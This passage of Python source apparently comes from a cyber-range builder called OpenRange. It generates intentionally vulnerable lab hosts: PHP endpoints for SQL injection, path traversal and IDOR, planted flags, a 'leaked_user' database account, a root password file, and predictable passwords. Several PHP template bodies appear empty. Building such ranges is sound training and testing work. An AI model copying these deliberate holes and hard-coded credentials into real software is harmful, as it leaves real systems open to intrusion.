("AppUs3r!2024", db_password), ("Svc!Ldap2024", ldap_bind_pw), ] for old, new in replacements: updated = updated.replace(old, new) updated = updated.replace("cn=webapp,dc=corp,dc=local", ldap_bind_dn) updated = re.sub( r"cn=webapp,dc=[A-Za-z0-9_-]+(?:,dc=[A-Za-z0-9_-]+)*", ldap_bind_dn, updated, ) return updated def _manifest_topology_users( manifest: dict[str, Any], *, seed: int | None, weak_creds_enabled: bool, ) -> list[dict[str, Any]]: raw_users = manifest.get("users", []) users: list[dict[str, Any]] = [] if isinstance(raw_users, list): for raw in raw_users: if not isinstance(raw, dict): continue username = str(raw.get("username", "")).strip() if not username: continue department = str(raw.get("department", "")).strip() role = str(raw.get("role", "")).strip() groups = [ department.lower().replace(" ", "_") for department in [department] if department ] or ["users"] if "it" in department.lower() or "admin" in role.lower(): groups = ["admins", *groups] password = _predictable_user_password( username, seed=seed, weak_creds_enabled=weak_creds_enabled and ("db" in raw.get("hosts", [])), ) users.append( { "username": username, "password": password, "groups": list(dict.fromkeys(groups)), "hosts": deepcopy(raw.get("hosts", [])), "email": str(raw.get("email", "")), "full_name": str(raw.get("full_name", "")), "department": department, "role": role, } ) if users: return users return [ { "username": "admin", "password": "root" if weak_creds_enabled else "Adm1n!Test", "groups": ["admins"], "hosts": ["web", "db"], }, { "username": "testuser", "password": _predictable_user_password( "testuser", seed=seed, weak_creds_enabled=False, ), "groups": ["users"], "hosts": ["web"], }, ] def render_template_payloads( snapshot: SnapshotSpec, *, manifest: dict[str, Any] | None = None, ) -> dict[str, str]: topology = snapshot.topology if isinstance(snapshot.topology, dict) else {} runtime_contract = runtime_contract_from_topology(topology, manifest=manifest) flags = snapshot.flags evidence_spec = snapshot.evidence_spec vuln_types = {v.type for v in snapshot.truth_graph.vulns} company = ( manifest.get("company", {}) if isinstance(manifest, dict) and isinstance(manifest.get("company"), dict) else {} ) company_name = str(topology.get("org_name") or company.get("name") or "OpenRange") domain = str(topology.get("domain") or company.get("domain") or "corp.local") web_host = runtime_contract["web_host"] db_host = runtime_contract["db_host"] web_doc_root = runtime_contract["web_doc_root"] web_config_path = runtime_contract["web_config_path"] db_name = runtime_contract["db_name"] files: dict[str, str] = { f"{web_host}:{_join_posix(web_doc_root, 'index.php')}": _default_index_php(company_name), f"{web_host}:{_join_posix(web_doc_root, 'login.php')}": _default_login_php(), f"{web_host}:{web_config_path}": _default_config_php( domain=domain, db_host=runtime_contract["db_host"], db_name=runtime_contract["db_name"], db_user=runtime_contract["db_user"], db_pass=runtime_contract["db_password"], ldap_bind_dn=runtime_contract["ldap_bind_dn"], ldap_bind_pw=runtime_contract["ldap_bind_pw"], ), } if "sqli" in vuln_types: files[f"{web_host}:{_join_posix(web_doc_root, 'search.php')}"] = _search_php( _flag_value_for_type(snapshot, "sqli") ) if "path_traversal" in vuln_types: files[f"{web_host}:{_join_posix(web_doc_root, 'download.php')}"] = _download_php( path_flag=_flag_value_for_type(snapshot, "path_traversal"), flag_names=_flag_names_for_type(snapshot, "path_traversal"), config_path=web_config_path, ) elif "credential_reuse" in vuln_types: files[f"{web_host}:{_join_posix(web_doc_root, 'download.php')}"] = _download_php( path_flag="", flag_names=[], config_path=web_config_path, ) if "idor" in vuln_types: files[f"{web_host}:{_join_posix(web_doc_root, 'api/index.php')}"] = _idor_api_php( _flag_value_for_type(snapshot, "idor"), ) for flag in flags: if flag.path.startswith("db:"): files["db:sql"] = _append_sql( files.get("db:sql", ""), ( "USE flags;\n" "INSERT INTO secrets(flag_name, flag) " f"VALUES ('{_sql_escape(flag.id)}', '{_sql_escape(flag.value)}');\n" ), ) if vuln_types.intersection({"weak_creds", "idor"}): files["db:sql"] = _append_sql( files.get("db:sql", ""), ( "CREATE USER IF NOT EXISTS 'leaked_user'@'%' " "IDENTIFIED BY 'leaked_pass';\n" "GRANT SELECT ON flags.* TO 'leaked_user'@'%';\n" f"GRANT SELECT ON {_sql_ident(db_name)}.* TO 'leaked_user'@'%';\n" "FLUSH PRIVILEGES;\n" ), ) elif "/" in flag.path: files[f"{flag.host}:{flag.path}"] = f"{flag.value}\n" for item in evidence_spec: if ":" not in item.location: continue files[item.location] = _append_text_payload( files.get(item.location, ""), item.pattern or f"evidence:{item.type}", ) if "weak_creds" in vuln_types: files[f"{db_host}:/tmp/openrange-root-password.txt"] = "root\n" return files def _flag_value_for_type( snapshot: SnapshotSpec, vuln_type: str, ) -> str: paired = _flag_for_type(snapshot, vuln_type) if paired is not None: return paired.value return snapshot.flags[0].value if snapshot.flags else "FLAG{placeholder}" def _flag_names_for_type( snapshot: SnapshotSpec, vuln_type: str, ) -> list[str]: paired = _flag_for_type(snapshot, vuln_type) if paired is None: return ["flag1.txt"] if paired.path.startswith("db:"): return ["flag1.txt"] return [PurePosixPath(paired.path).name] def _flag_for_type( snapshot: SnapshotSpec, vuln_type: str, ) -> FlagSpec | None: for index, vuln in enumerate(snapshot.truth_graph.vulns): if vuln.type != vuln_type: continue if index < len(snapshot.flags): return snapshot.flags[index] for flag in snapshot.flags: if flag.host == vuln.host: return flag if snapshot.flags: return snapshot.flags[0] return None def _append_sql(existing: str, fragment: str) -> str: if not existing: return fragment return f"{existing.rstrip()}\n{fragment}" def _join_posix(base: str, leaf: str) -> str: return (PurePosixPath(base) / leaf).as_posix() def _sql_ident(value: str) -> str: token = re.sub(r"[^A-Za-z0-9_]", "", value) return token or "referral_db" def _sql_escape(value: str) -> str: """Escape a string for use in a SQL single-quoted literal. Replaces single quotes with doubled single quotes and backslashes with doubled backslashes to prevent SQL injection in static SQL files. """ return value.replace("\\", "\\\\").replace("'", "''") def _predictable_user_password( username: str, *, seed: int | None, weak_creds_enabled: bool, ) -> str: if weak_creds_enabled and username in {"admin", "root"}: return "root" suffix = 2025 if seed is None else 2025 + (seed % 3) base = username.split("@", 1)[0] or "Welcome" return f"{base.capitalize()}!{suffix}" def _append_text_payload(existing: str, fragment: str) -> str: line = fragment.rstrip("\n") if not existing: return f"{line}\n" return f"{existing.rstrip()}\n{line}\n" def _default_index_php(company_name: str) -> str: return f"""""" def _default_login_php() -> str: return """""" def _default_config_php( *, domain: str, db_host: str, db_name: str, db_user: str, db_pass: str, ldap_bind_dn: str, ldap_bind_pw: str, ) -> str: ldap_dn = ",".join(f"dc={part}" for part in domain.split(".") if part) or "dc=corp,dc=local" bind_dn = ldap_bind_dn or f"cn={db_user},{ldap_dn}" bind_pw = ldap_bind_pw or db_pass return f"""""" def _search_php(flag_value: str) -> str: return f"""""" def _download_php( path_flag: str, flag_names: list[str] | None = None, *, config_path: str, ) -> str: flag = path_flag or "FLAG{placeholder}" raw_names = ["flag1.txt"] if flag_names is None else flag_names cases = "\n".join( f"""elseif (strpos($file, "{name}") !== false) {{ echo "{flag}"; }}""" for name in raw_names ) return f"""""" def _idor_api_php(flag_value: str) -> str: return f""" "admin", "role" => "admin"]); }} elseif (strpos($uri, "/api/users/2/profile") !== false) {{ echo json_encode([ "username" => "billing", "password" => "leaked_pass", "flag_hint" => "{flag_value}" ]); }} else {{ echo json_encode(["status" => "not_found"]); }} ?>""" # --------------------------------------------------------------------------- # File-based builder (demos) # --------------------------------------------------------------------------- class FileBuilder: """Load a pre-built snapshot from a JSON file on disk. For demos and smoke tests where you want instant, known-good snapshots without any LLM calls. """ def __init__(self, snapshot_dir: str = "snapshots") -> None: """Initialize with the directory containing snapshot JSON files.""" self.snapshot_dir = Path(snapshot_dir) async def build( self, manifest: dict, context: BuildContext, ) -> SnapshotSpec: """Load a snapshot JSON file, optionally picking by seed.""" if not self.snapshot_dir.exists(): raise FileNotFoundError( f"Snapshot directory not found: {self.snapshot_dir}" ) files = sorted(self.snapshot_dir.glob("**/spec.json")) if not files: # Fall back to any .json files files = sorted(self.snapshot_dir.glob("*.json")) if not files: raise FileNotFoundError( f"No snapshot JSON files found in {self.snapshot_dir}" ) if context.seed is not None: chosen = files[context.seed % len(files)] else: chosen = files[0] logger.info("FileBuilder: loading snapshot from %s", chosen) raw = json.loads(chosen.read_text()) return _parse_llm_response(json.dumps(raw))